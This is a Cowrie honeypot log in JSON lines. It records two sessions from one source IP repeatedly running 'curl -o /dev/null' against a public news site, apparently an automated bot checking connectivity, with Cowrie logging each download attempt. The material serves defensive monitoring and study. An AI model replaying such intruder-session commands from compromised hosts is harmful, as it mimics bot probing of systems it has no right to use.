{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.673723Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.678797Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.699340Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.700210Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.714525Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.718426Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.719491Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.743665Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.744729Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.746557Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.748288Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.755628Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.756566Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.785253Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.786304Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.801353Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.803256Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.805520Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.807220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.835473Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.837267Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.841666Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.842793Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.845130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.846174Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.885254Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.887460Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.888483Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.890717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.891662Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.908950Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.934288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.935464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.938120Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.939173Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.947194Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.948620Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.982038Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.983351Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.989635Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.990779Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.993268Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.995054Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.027968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.029006Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.033870Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.034956Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.038480Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.039486Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.067872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.069565Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.082554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.084065Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.085625Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.088311Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.109649Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.111065Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.129437Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.130774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.136835Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.138258Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.150965Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.152107Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.171869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.173277Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.187104Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.190026Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.193803Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.195026Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.213297Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.214879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.230838Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.233192Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.236369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.237576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.254367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.255744Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.275294Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.281347Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.282820Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.301538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.302977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.313838Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.320552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.322003Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.342980Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.344264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.357602Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.362703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.364066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.387635Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.388872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.396678Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.406083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.407268Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.418855Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.433540Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.434962Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.438244Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.443921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.445312Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.460599Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.462584Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.480459Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.481908Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.486970Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.488217Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.499532Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.501480Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.522281Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.523687Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.530372Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.531484Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.544637Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.546297Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.562235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.563685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.572115Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.573188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.574817Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.595669Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:05.597489Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:05.610554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
